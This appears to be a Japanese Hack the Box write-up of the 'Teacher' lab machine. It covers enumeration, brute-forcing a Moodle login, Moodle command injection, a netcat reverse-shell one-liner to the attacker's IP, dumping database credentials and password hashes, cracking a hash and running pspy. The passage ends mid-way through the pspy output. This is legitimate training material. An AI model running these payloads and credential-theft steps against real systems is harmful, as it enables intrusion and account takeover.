【Hack the Box write-up】Teacher

April 11, 2020

はじめに

筆者は Hack the Box 初心者です。 何か訂正や補足、アドバイスなどありましたら、コメントか Twitter までお願いします。 さんぽし(@sanpo_shiho) | Twitter

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

machine について

難易度は easy です。 スクリーンショット 2020-04-11 18.22.07.png

Easy の machine のなかで 2 番目に評価が高い machine です

nmap

[email protected]:~$ nmap -sC -sV 10.10.10.153
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-20 05:36 EDT
Nmap scan report for 10.10.10.153
Host is up (0.18s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.74 seconds

80 番 port をブラウザで見てみる

スクリーンショット 2020-03-29 18.42.37.png

gobuster

[email protected]:~$ gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50 -u http://10.10.10.153
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.153
[+] Threads:        50
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/29 05:17:36 Starting gobuster
===============================================================
/images (Status: 301)
/css (Status: 301)
/manual (Status: 301)
/js (Status: 301)
/javascript (Status: 301)
/fonts (Status: 301)
/phpmyadmin (Status: 403)
/moodle (Status: 301)
/server-status (Status: 403)
===============================================================
2020/03/29 05:31:37 Finished
===============================================================

Web サイトを頑張って探索

/gallery.htmlのページのソースをみると何か一部分おかしい所がありますね。

スクリーンショット 2020-03-29 15.07.49.png

images/5.pngによくわからない処理がくっ付いています。 /images/5.pngを開いても何も表示されないので curl で見てみます。

$ curl http://10.10.10.153/images/5.png
Hi Servicedesk,

I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.

Could you guys figure out what the last charachter is, or just reset it?

Thanks,
Giovanni

なるほど… “That’s an F” というのはこのメッセージに対する答えだったようですね。

/moodle からログイン

わかった情報を用いてログインします。 しかし、giovanni/Th4C00lTheachaF でログインしようとしてもログインできません。おいおい。。

brute force でゴリ押す

とりあえず the last character が F じゃないのかもしれないので brute force します。 list は /usr/share/wordlists/dirb/stress/alphanum_case_extra.txt を使用します

以下の設定で Burp の Intruder を使用します

スクリーンショット 2020-03-29 20.16.53.png スクリーンショット 2020-03-29 20.16.30.png スクリーンショット 2020-03-29 20.16.42.png

すると スクリーンショット 2020-03-29 20.16.14.png このように Th4C00lTheacha# で成功します。

password に Th4C00lTheacha# を使って

スクリーンショット 2020-03-29 20.20.21.png

ログインに成功します(結局 That’s an F は何やったんや…)

moodle の Remote Code Execution

moodle には一部のバージョンで Remote Code Execution の脆弱性があります

https://blog.ripstech.com/2018/moodle-remote-code-execution/ こちらのサイトで紹介されている動画の通りに進めます(少し説明するにはめんどくさいのでサイトをチェックしてみてください)

スクリーンショット 2020-04-11 16.18.27.png

スクリーンショット 2020-04-11 16.26.15.png ↑url に&0=ping 10.10.14.13 で ping が通るか試しています

[email protected]:~$ sudo tcpdump -i tun0
[sudo] password for kali:
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
03:22:55.665518 IP 10.10.14.13.52754 > 10.10.10.153.http: Flags [S], seq 3529097773, win 64240, options [mss 1460,sackOK,TS val 89662984 ecr 0,nop,wscale 7], length 0
03:22:55.837589 IP 10.10.10.153.http > 10.10.14.13.52754: Flags [S.], seq 2770244404, ack 3529097774, win 28960, options [mss 1357,sackOK,TS val 416124 ecr 89662984,nop,wscale 7], length 0
03:22:55.837642 IP 10.10.14.13.52754 > 10.10.10.153.http: Flags [.], ack 1, win 502, options [nop,nop,TS val 89663156 ecr 416124], length 0
03:22:55.838152 IP 10.10.14.13.52754 > 10.10.10.153.http: Flags [P.], seq 1:550, ack 1, win 502, options [nop,nop,TS val 89663157 ecr 416124], length 549: HTTP: GET /moodle/question/question.php?returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D7%26addonpage%3D0&appendqnumstring=addquestion&scrollpos=0&id=6&wizardnow=datasetitems&cmid=7&0=ping%2010.10.14.13 HTTP/1.1
03:22:56.010796 IP 10.10.10.153.http > 10.10.14.13.52754: Flags [.], ack 550, win 235, options [nop,nop,TS val 416167 ecr 89663157], length 0
03:22:56.047524 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 1, length 64
03:22:56.047559 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 1, length 64
03:22:57.049785 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 2, length 64
03:22:57.049810 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 2, length 64
03:22:58.157466 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 3, length 64
03:22:58.157645 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 3, length 64
03:22:59.111049 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 4, length 64
03:22:59.111081 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 4, length 64
03:23:00.103073 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 5, length 64
03:23:00.103102 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 5, length 64
03:23:01.129041 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 6, length 64
03:23:01.129076 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 6, length 64
03:23:02.152756 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 7, length 64
03:23:02.152782 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 7, length 64
03:23:03.058237 IP 10.10.10.153 > 10.10.14.13: ICMP echo request, id 1228, seq 8, length 64
03:23:03.058274 IP 10.10.14.13 > 10.10.10.153: ICMP echo reply, id 1228, seq 8, length 64

通りました

シェルを取る

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4242 >/tmp/fを使います (URL エンコードをしてから 0= の後にくっつけると成功します)

[email protected]:~$ nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.153] 58168
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/var/www/html/moodle/question$

mysql を覗く

config.phpに DB の情報があるのでこれを使って mysql を覗きます

[email protected]:/var/www/html/moodle$ cat config.php
<?php  // Moodle configuration file

unset($CFG);
global $CFG;
$CFG = new stdClass();

$CFG->dbtype    = 'mariadb';
$CFG->dblibrary = 'native';
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'root';
$CFG->dbpass    = 'Welkom1!';
$CFG->prefix    = 'mdl_';
$CFG->dboptions = array (
  'dbpersist' => 0,
  'dbport' => 3306,
  'dbsocket' => '',
  'dbcollation' => 'utf8mb4_unicode_ci',
);

$CFG->wwwroot   = 'http://10.10.10.153/moodle';
$CFG->dataroot  = '/var/www/moodledata';
$CFG->admin     = 'admin';

$CFG->directorypermissions = 0777;

require_once(__DIR__ . '/lib/setup.php');

// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!
[email protected]:/var/www/html/moodle/question$ mysql -u root -p
mysql -u root -p
Enter password: Welkom1!

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 60
Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show database
show database
    -> ;
;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'database' at line 1
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| moodle             |
| mysql              |
| performance_schema |
| phpmyadmin         |
+--------------------+
5 rows in set (0.00 sec)

MariaDB [(none)]> show tables
show tables
    -> ;
;
ERROR 1046 (3D000): No database selected
MariaDB [(none)]> shoe tables;
shoe tables;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'shoe tables' at line 1
MariaDB [(none)]> show tables;
show tables;
ERROR 1046 (3D000): No database selected
MariaDB [(none)]> use moodle
use moodle
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [moodle]> show tables;
show tables;
+----------------------------------+
| Tables_in_moodle                 |
+----------------------------------+
| mdl_analytics_indicator_calc     |
| mdl_analytics_models             |
| mdl_analytics_models_log         |
| mdl_analytics_predict_samples    |
| mdl_analytics_prediction_actions |
| mdl_analytics_predictions        |
| mdl_analytics_train_samples      |
| mdl_analytics_used_analysables   |
| mdl_analytics_used_files         |
| mdl_assign                       |
| mdl_assign_grades                |
| mdl_assign_overrides             |
| mdl_assign_plugin_config         |
| mdl_assign_submission            |
| mdl_assign_user_flags            |
| mdl_assign_user_mapping          |
| mdl_assignfeedback_comments      |
| mdl_assignfeedback_editpdf_annot |
| mdl_assignfeedback_editpdf_cmnt  |
| mdl_assignfeedback_editpdf_queue |
| mdl_assignfeedback_editpdf_quick |
| mdl_assignfeedback_file          |
| mdl_assignment                   |
| mdl_assignment_submissions       |
| mdl_assignment_upgrade           |
| mdl_assignsubmission_file        |
| mdl_assignsubmission_onlinetext  |
| mdl_auth_oauth2_linked_login     |
| mdl_backup_controllers           |
| mdl_backup_courses               |
| mdl_backup_logs                  |
| mdl_badge                        |
| mdl_badge_backpack               |
| mdl_badge_criteria               |
| mdl_badge_criteria_met           |
| mdl_badge_criteria_param         |
| mdl_badge_external               |
| mdl_badge_issued                 |
| mdl_badge_manual_award           |
| mdl_block                        |
| mdl_block_community              |
| mdl_block_instances              |
| mdl_block_positions              |
| mdl_block_recent_activity        |
| mdl_block_rss_client             |
| mdl_blog_association             |
| mdl_blog_external                |
| mdl_book                         |
| mdl_book_chapters                |
| mdl_cache_filters                |
| mdl_cache_flags                  |
| mdl_capabilities                 |
| mdl_chat                         |
| mdl_chat_messages                |
| mdl_chat_messages_current        |
| mdl_chat_users                   |
| mdl_choice                       |
| mdl_choice_answers               |
| mdl_choice_options               |
| mdl_cohort                       |
| mdl_cohort_members               |
| mdl_comments                     |
| mdl_competency                   |
| mdl_competency_coursecomp        |
| mdl_competency_coursecompsetting |
| mdl_competency_evidence          |
| mdl_competency_framework         |
| mdl_competency_modulecomp        |
| mdl_competency_plan              |
| mdl_competency_plancomp          |
| mdl_competency_relatedcomp       |
| mdl_competency_template          |
| mdl_competency_templatecohort    |
| mdl_competency_templatecomp      |
| mdl_competency_usercomp          |
| mdl_competency_usercompcourse    |
| mdl_competency_usercompplan      |
| mdl_competency_userevidence      |
| mdl_competency_userevidencecomp  |
| mdl_config                       |
| mdl_config_log                   |
| mdl_config_plugins               |
| mdl_context                      |
| mdl_context_temp                 |
| mdl_course                       |
| mdl_course_categories            |
| mdl_course_completion_aggr_methd |
| mdl_course_completion_crit_compl |
| mdl_course_completion_criteria   |
| mdl_course_completion_defaults   |
| mdl_course_completions           |
| mdl_course_format_options        |
| mdl_course_modules               |
| mdl_course_modules_completion    |
| mdl_course_published             |
| mdl_course_request               |
| mdl_course_sections              |
| mdl_data                         |
| mdl_data_content                 |
| mdl_data_fields                  |
| mdl_data_records                 |
| mdl_editor_atto_autosave         |
| mdl_enrol                        |
| mdl_enrol_flatfile               |
| mdl_enrol_lti_lti2_consumer      |
| mdl_enrol_lti_lti2_context       |
| mdl_enrol_lti_lti2_nonce         |
| mdl_enrol_lti_lti2_resource_link |
| mdl_enrol_lti_lti2_share_key     |
| mdl_enrol_lti_lti2_tool_proxy    |
| mdl_enrol_lti_lti2_user_result   |
| mdl_enrol_lti_tool_consumer_map  |
| mdl_enrol_lti_tools              |
| mdl_enrol_lti_users              |
| mdl_enrol_paypal                 |
| mdl_event                        |
| mdl_event_subscriptions          |
| mdl_events_handlers              |
| mdl_events_queue                 |
| mdl_events_queue_handlers        |
| mdl_external_functions           |
| mdl_external_services            |
| mdl_external_services_functions  |
| mdl_external_services_users      |
| mdl_external_tokens              |
| mdl_feedback                     |
| mdl_feedback_completed           |
| mdl_feedback_completedtmp        |
| mdl_feedback_item                |
| mdl_feedback_sitecourse_map      |
| mdl_feedback_template            |
| mdl_feedback_value               |
| mdl_feedback_valuetmp            |
| mdl_file_conversion              |
| mdl_files                        |
| mdl_files_reference              |
| mdl_filter_active                |
| mdl_filter_config                |
| mdl_folder                       |
| mdl_forum                        |
| mdl_forum_digests                |
| mdl_forum_discussion_subs        |
| mdl_forum_discussions            |
| mdl_forum_posts                  |
| mdl_forum_queue                  |
| mdl_forum_read                   |
| mdl_forum_subscriptions          |
| mdl_forum_track_prefs            |
| mdl_glossary                     |
| mdl_glossary_alias               |
| mdl_glossary_categories          |
| mdl_glossary_entries             |
| mdl_glossary_entries_categories  |
| mdl_glossary_formats             |
| mdl_grade_categories             |
| mdl_grade_categories_history     |
| mdl_grade_grades                 |
| mdl_grade_grades_history         |
| mdl_grade_import_newitem         |
| mdl_grade_import_values          |
| mdl_grade_items                  |
| mdl_grade_items_history          |
| mdl_grade_letters                |
| mdl_grade_outcomes               |
| mdl_grade_outcomes_courses       |
| mdl_grade_outcomes_history       |
| mdl_grade_settings               |
| mdl_grading_areas                |
| mdl_grading_definitions          |
| mdl_grading_instances            |
| mdl_gradingform_guide_comments   |
| mdl_gradingform_guide_criteria   |
| mdl_gradingform_guide_fillings   |
| mdl_gradingform_rubric_criteria  |
| mdl_gradingform_rubric_fillings  |
| mdl_gradingform_rubric_levels    |
| mdl_groupings                    |
| mdl_groupings_groups             |
| mdl_groups                       |
| mdl_groups_members               |
| mdl_imscp                        |
| mdl_label                        |
| mdl_lesson                       |
| mdl_lesson_answers               |
| mdl_lesson_attempts              |
| mdl_lesson_branch                |
| mdl_lesson_grades                |
| mdl_lesson_overrides             |
| mdl_lesson_pages                 |
| mdl_lesson_timer                 |
| mdl_license                      |
| mdl_lock_db                      |
| mdl_log                          |
| mdl_log_display                  |
| mdl_log_queries                  |
| mdl_logstore_standard_log        |
| mdl_lti                          |
| mdl_lti_submission               |
| mdl_lti_tool_proxies             |
| mdl_lti_tool_settings            |
| mdl_lti_types                    |
| mdl_lti_types_config             |
| mdl_message                      |
| mdl_message_airnotifier_devices  |
| mdl_message_contacts             |
| mdl_message_popup                |
| mdl_message_processors           |
| mdl_message_providers            |
| mdl_message_read                 |
| mdl_message_working              |
| mdl_messageinbound_datakeys      |
| mdl_messageinbound_handlers      |
| mdl_messageinbound_messagelist   |
| mdl_mnet_application             |
| mdl_mnet_host                    |
| mdl_mnet_host2service            |
| mdl_mnet_log                     |
| mdl_mnet_remote_rpc              |
| mdl_mnet_remote_service2rpc      |
| mdl_mnet_rpc                     |
| mdl_mnet_service                 |
| mdl_mnet_service2rpc             |
| mdl_mnet_session                 |
| mdl_mnet_sso_access_control      |
| mdl_mnetservice_enrol_courses    |
| mdl_mnetservice_enrol_enrolments |
| mdl_modules                      |
| mdl_my_pages                     |
| mdl_oauth2_endpoint              |
| mdl_oauth2_issuer                |
| mdl_oauth2_system_account        |
| mdl_oauth2_user_field_mapping    |
| mdl_page                         |
| mdl_portfolio_instance           |
| mdl_portfolio_instance_config    |
| mdl_portfolio_instance_user      |
| mdl_portfolio_log                |
| mdl_portfolio_mahara_queue       |
| mdl_portfolio_tempdata           |
| mdl_post                         |
| mdl_profiling                    |
| mdl_qtype_ddimageortext          |
| mdl_qtype_ddimageortext_drags    |
| mdl_qtype_ddimageortext_drops    |
| mdl_qtype_ddmarker               |
| mdl_qtype_ddmarker_drags         |
| mdl_qtype_ddmarker_drops         |
| mdl_qtype_essay_options          |
| mdl_qtype_match_options          |
| mdl_qtype_match_subquestions     |
| mdl_qtype_multichoice_options    |
| mdl_qtype_randomsamatch_options  |
| mdl_qtype_shortanswer_options    |
| mdl_question                     |
| mdl_question_answers             |
| mdl_question_attempt_step_data   |
| mdl_question_attempt_steps       |
| mdl_question_attempts            |
| mdl_question_calculated          |
| mdl_question_calculated_options  |
| mdl_question_categories          |
| mdl_question_dataset_definitions |
| mdl_question_dataset_items       |
| mdl_question_datasets            |
| mdl_question_ddwtos              |
| mdl_question_gapselect           |
| mdl_question_hints               |
| mdl_question_multianswer         |
| mdl_question_numerical           |
| mdl_question_numerical_options   |
| mdl_question_numerical_units     |
| mdl_question_response_analysis   |
| mdl_question_response_count      |
| mdl_question_statistics          |
| mdl_question_truefalse           |
| mdl_question_usages              |
| mdl_quiz                         |
| mdl_quiz_attempts                |
| mdl_quiz_feedback                |
| mdl_quiz_grades                  |
| mdl_quiz_overrides               |
| mdl_quiz_overview_regrades       |
| mdl_quiz_reports                 |
| mdl_quiz_sections                |
| mdl_quiz_slots                   |
| mdl_quiz_statistics              |
| mdl_rating                       |
| mdl_registration_hubs            |
| mdl_repository                   |
| mdl_repository_instance_config   |
| mdl_repository_instances         |
| mdl_repository_onedrive_access   |
| mdl_resource                     |
| mdl_resource_old                 |
| mdl_role                         |
| mdl_role_allow_assign            |
| mdl_role_allow_override          |
| mdl_role_allow_switch            |
| mdl_role_assignments             |
| mdl_role_capabilities            |
| mdl_role_context_levels          |
| mdl_role_names                   |
| mdl_role_sortorder               |
| mdl_scale                        |
| mdl_scale_history                |
| mdl_scorm                        |
| mdl_scorm_aicc_session           |
| mdl_scorm_scoes                  |
| mdl_scorm_scoes_data             |
| mdl_scorm_scoes_track            |
| mdl_scorm_seq_mapinfo            |
| mdl_scorm_seq_objective          |
| mdl_scorm_seq_rolluprule         |
| mdl_scorm_seq_rolluprulecond     |
| mdl_scorm_seq_rulecond           |
| mdl_scorm_seq_ruleconds          |
| mdl_search_index_requests        |
| mdl_sessions                     |
| mdl_stats_daily                  |
| mdl_stats_monthly                |
| mdl_stats_user_daily             |
| mdl_stats_user_monthly           |
| mdl_stats_user_weekly            |
| mdl_stats_weekly                 |
| mdl_survey                       |
| mdl_survey_analysis              |
| mdl_survey_answers               |
| mdl_survey_questions             |
| mdl_tag                          |
| mdl_tag_area                     |
| mdl_tag_coll                     |
| mdl_tag_correlation              |
| mdl_tag_instance                 |
| mdl_task_adhoc                   |
| mdl_task_scheduled               |
| mdl_tool_cohortroles             |
| mdl_tool_customlang              |
| mdl_tool_customlang_components   |
| mdl_tool_monitor_events          |
| mdl_tool_monitor_history         |
| mdl_tool_monitor_rules           |
| mdl_tool_monitor_subscriptions   |
| mdl_tool_recyclebin_category     |
| mdl_tool_recyclebin_course       |
| mdl_tool_usertours_steps         |
| mdl_tool_usertours_tours         |
| mdl_upgrade_log                  |
| mdl_url                          |
| mdl_user                         |
| mdl_user_devices                 |
| mdl_user_enrolments              |
| mdl_user_info_category           |
| mdl_user_info_data               |
| mdl_user_info_field              |
| mdl_user_lastaccess              |
| mdl_user_password_history        |
| mdl_user_password_resets         |
| mdl_user_preferences             |
| mdl_user_private_key             |
| mdl_wiki                         |
| mdl_wiki_links                   |
| mdl_wiki_locks                   |
| mdl_wiki_pages                   |
| mdl_wiki_subwikis                |
| mdl_wiki_synonyms                |
| mdl_wiki_versions                |
| mdl_workshop                     |
| mdl_workshop_aggregations        |
| mdl_workshop_assessments         |
| mdl_workshop_assessments_old     |
| mdl_workshop_comments_old        |
| mdl_workshop_elements_old        |
| mdl_workshop_grades              |
| mdl_workshop_grades_old          |
| mdl_workshop_old                 |
| mdl_workshop_rubrics_old         |
| mdl_workshop_stockcomments_old   |
| mdl_workshop_submissions         |
| mdl_workshop_submissions_old     |
| mdl_workshopallocation_scheduled |
| mdl_workshopeval_best_settings   |
| mdl_workshopform_accumulative    |
| mdl_workshopform_comments        |
| mdl_workshopform_numerrors       |
| mdl_workshopform_numerrors_map   |
| mdl_workshopform_rubric          |
| mdl_workshopform_rubric_config   |
| mdl_workshopform_rubric_levels   |
+----------------------------------+
388 rows in set (0.00 sec)

MariaDB [moodle]> select * from mdl_user
select * from mdl_user
    -> ;
;
+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
| id   | auth   | confirmed | policyagreed | deleted | suspended | mnethostid | username    | password                                                     | idnumber | firstname  | lastname | email          | emailstop | icq | skype | yahoo | aim | msn | phone1 | phone2 | institution | department | address | city | country | lang | calendartype | theme | timezone | firstaccess | lastaccess | lastlogin  | currentlogin | lastip        | secret | picture | url | description                                                               | descriptionformat | mailformat | maildigest | maildisplay | autosubscribe | trackforums | timecreated | timemodified | trustbitmask | imagealt | lastnamephonetic | firstnamephonetic | middlename | alternatename |
+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
|    1 | manual |         1 |            0 |       0 |         0 |          1 | guest       | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |          | Guest user |          | [email protected] |         0 |     |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |           0 |          0 |          0 |            0 |               |        |       0 |     | This user is a special user that allows read-only access to some courses. |                 1 |          1 |          0 |           2 |             1 |           0 |           0 |   1530058999 |            0 | NULL     | NULL             | NULL              | NULL       | NULL          |
|    2 | manual |         1 |            0 |       0 |         0 |          1 | admin       | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |          | Admin      | User     | [email protected]     |         0 |     |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |  1530059097 | 1530059573 | 1530059097 |   1530059307 | 192.168.206.1 |        |       0 |     |                                                                           |                 1 |          1 |          0 |           1 |             1 |           0 |           0 |   1530059135 |            0 | NULL     |                  |                   |            |               |
|    3 | manual |         1 |            0 |       0 |         0 |          1 | giovanni    | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |          | Giovanni   | Chhatta  | [email protected]    |         0 |     |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |  1530059681 | 1586592855 | 1530069132 |   1586592777 | 10.10.14.13   |        |       0 |     |                                                                           |                 1 |          1 |          0 |           2 |             1 |           0 |  1530059291 |   1530059291 |            0 |          |                  |                   |            |               |
| 1337 | manual |         0 |            0 |       0 |         0 |          0 | Giovannibak | 7a860966115182402ed06375cf0a22af                             |          |            |          |                |         0 |     |       |       |     |     |        |        |             |            |         |      |         | en   | gregorian    |       | 99       |           0 |          0 |          0 |            0 |               |        |       0 |     | NULL                                                                      |                 1 |          1 |          0 |           2 |             1 |           0 |           0 |            0 |            0 | NULL     | NULL             | NULL              | NULL       | NULL          |
+------+--------+-----------+--------------+---------+-----------+------------+-------------+--------------------------------------------------------------+----------+------------+----------+----------------+-----------+-----+-------+-------+-----+-----+--------+--------+-------------+------------+---------+------+---------+------+--------------+-------+----------+-------------+------------+------------+--------------+---------------+--------+---------+-----+---------------------------------------------------------------------------+-------------------+------------+------------+-------------+---------------+-------------+-------------+--------------+--------------+----------+------------------+-------------------+------------+---------------+
4 rows in set (0.00 sec)

MariaDB [moodle]> select username, password from mdl_user;
select username, password from mdl_user;
+-------------+--------------------------------------------------------------+
| username    | password                                                     |
+-------------+--------------------------------------------------------------+
| guest       | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin       | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni    | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af                             |
+-------------+--------------------------------------------------------------+
4 rows in set (0.00 sec)

MariaDB [moodle]> \q
\q
Bye

出てきた password を調べて giovanni に昇格

以下のサイトで調べます https://crackstation.net/

スクリーンショット 2020-04-11 17.54.19.png

出てきた expelled を使って giovanni に切り替えます

[email protected]:/var/www/html/moodle/question$ su giovanni
su giovanni
Password: expelled

[email protected]:/var/www/html/moodle/question$ cd /
cd /

[email protected]:/$ ls
ls
bin   etc         initrd.img.old  lost+found  opt   run   sys  var
boot  home        lib             media       proc  sbin  tmp  vmlinuz
dev   initrd.img  lib64           mnt         root  srv   usr  vmlinuz.old

[email protected]:/$ cd home
cd home
[email protected]:/home$ ls
ls
giovanni
[email protected]:/home$ cd giovanni
cd giovanni
[email protected]:~$ ls
ls
user.txt  work
[email protected]:~$ cat user.txt

user.txt が取れました

~/giovanni の中を色々調べる

[email protected]:~$ ls
ls
user.txt  work
[email protected]:~$ cd work
cd work
[email protected]:~/work$ find .
find .
.
./tmp
./tmp/courses
./tmp/courses/algebra
./tmp/courses/algebra/answersAlgebra
./tmp/backup_courses.tar.gz
./courses
./courses/algebra
./courses/algebra/answersAlgebra

僕はここで完全に詰まったわけですが、

これでした。

[email protected]:~/work$ ls -lR
ls -lR
.:
total 8
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27  2018 courses
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27  2018 tmp

./courses:
total 4
drwxr-xr-x 2 root root 4096 Jun 27  2018 algebra

./courses/algebra:
total 4
-rw-r--r-- 1 giovanni giovanni 109 Jun 27  2018 answersAlgebra

./tmp:
total 8
-rwxrwxrwx 1 root root  256 Apr 11 10:25 backup_courses.tar.gz
drwxrwxrwx 3 root root 4096 Jun 27  2018 courses

./tmp/courses:
total 4
drwxrwxrwx 2 root root 4096 Jun 27  2018 algebra

./tmp/courses/algebra:
total 4
-rwxrwxrwx 1 giovanni giovanni 109 Jun 27  2018 answersAlgebra

root 所有の backup_courses.tar.gz が Timestamp に気がつくべきでした。。

pspy を使う

だいたいこういう時は何かしらの cronjob が backup_courses.tar.gz を更新し続けてるんだろうと思われるので pspy を使って cronjob を調べます

[email protected]:~/work$ ./pspy64
./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░
                   ░           ░ ░
                               ░ ░

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/04/11 10:45:54 CMD: UID=1000 PID=958    | bash
2020/04/11 10:45:54 CMD: UID=1000 PID=956    | (sd-pam)
2020/04/11 10:45:54 CMD: UID=1000 PID=955    | /lib/systemd/systemd --user
2020/04/11 10:45:54 CMD: UID=33   PID=954    | su giovanni
2020/04/11 10:45:54 CMD: UID=33   PID=903    | /bin/bash
2020/04/11 10:45:54 CMD: UID=33   PID=902    | python -c import pty;pty.spawn("/bin/bash")
2020/04/11 10:45:54 CMD: UID=0    PID=9      |
2020/04/11 10:45:54 CMD: UID=33   PID=892    | nc 10.10.14.13 4242
2020/04/11 10:45:54 CMD: UID=33   PID=891    | /bin/sh -i
2020/04/11 10:45:54 CMD: UID=33   PID=890    | cat /tmp/f
2020/04/11 10:45:54 CMD: UID=33   PID=887    | sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 4242 >/tmp/f
2020/04/11 10:45:54 CMD: UID=0    PID=87     |
2020/04/11 10:45:54 CMD: UID=0    PID=86     |
2020/04/11 10:45:54 CMD: UID=33   PID=853    | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33   PID=852    | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33   PID=851    | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=33   PID=850    | /usr/sbin/apache2 -k start
2020/04/11 10:45:54 CMD: UID=0    PID=85     |
2020/04/11 10:45:54 CMD: UID=33   PID=848    | /usr/sbin/apache2 -k start
